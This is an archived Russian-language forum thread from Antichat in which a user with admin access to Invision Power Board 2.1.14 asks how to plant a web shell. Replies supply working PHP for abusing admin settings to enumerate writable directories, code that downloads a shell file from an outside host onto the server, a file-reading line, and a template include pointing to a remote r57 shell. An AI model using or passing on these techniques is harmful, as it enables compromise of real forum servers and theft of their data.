ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Заливка шелла в ipb 2.1.14, имея доступ в админку |
30.03.2007, 18:47
|
|
Новичок
Регистрация: 13.03.2007
Сообщений: 11
Провел на форуме:
116353
Репутация:
-2
|
|
Заливка шелла в ipb 2.1.14, имея доступ в админку
Везде искал так и ненашел способа.
Имею полный доступ к админке ipb 2.1.14.
Через смайлики не заливается что делать ?
|
|
|
30.03.2007, 18:55
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
http://www.someshit.net/showthread.php?p=357#post357
|
|
|
|
01.04.2007, 00:41
|
|
Новичок
Регистрация: 21.01.2007
Сообщений: 4
Провел на форуме:
13478
Репутация:
0
|
|
попробуй через инклудинг, помоему это сработает
|
|
|
|
02.04.2007, 03:25
|
|
Познающий
Регистрация: 24.06.2006
Сообщений: 35
Провел на форуме:
85679
Репутация:
10
|
|
лей через настройки.
|
|
|
|
02.04.2007, 09:34
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
Заходиш в настройки -> выбираеш любую настройку -> добавить настройку.
В поле php код вбиваеш:
$d = dir(".");
echo "Path: " . realpath($d->path) . "<br />\n";
while (false !== ($entry = $d->read())) {
if (is_dir(realpath($d->path).'/'.$entry)) {
echo "[".$entry."]".(is_writable(realpath($d->path).'/'.$entry)
? '[w]' : '').
"<br />\n";
} else {
echo $entry.(is_writable(realpath($d->path).'/'.$entry) ?
'[w]' : '')."<br />\n";
}
}
$d->close();
Потом ищиш диру где разрешена запись и таким же способом загружаеш шелл, вот код для удалённой загрузки:
$linky="http://site.ru/shell.php";
$saved="/путь_до_расширенной_диры/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);
У меня такое всегда работает даже когда SafeMode On
Если хочеш прочитать какой либо файл ,то вбиваеш в поле php код следующее:
echo nl2br(htmlspecialchars(implode('', file('/путь_до_файла/file.php'))));
Последний раз редактировалось GrAmOzEkA; 02.04.2007 в 09:41..
|
|
|
|
02.04.2007, 15:43
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Для особенно "пряморуких" людей, у которых не получается ни один из вышеперечисленных способов, а шелл заинклудить очень хочется )) Есть вариант работающий со всеми версиями IPB.
В основном шаблоне форума (Board Header and Footer Wrapper) можно вот так заинклудить
Код:
<!--exec.url="http://underwater.xtoolz.ru/shell/r57.txt"-->
Так же и локальные файлы инклудить можно только с помощью exec.file. |
|
|
|
02.04.2007, 16:17
|
|
Новичок
Регистрация: 13.03.2007
Сообщений: 11
Провел на форуме:
116353
Репутация:
-2
|
|
Cпасибо ребят!  Я как 2 дня разобрался с этим Вся инфа тут http://www.someshit.net/showthread.php?p=357#post357! |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
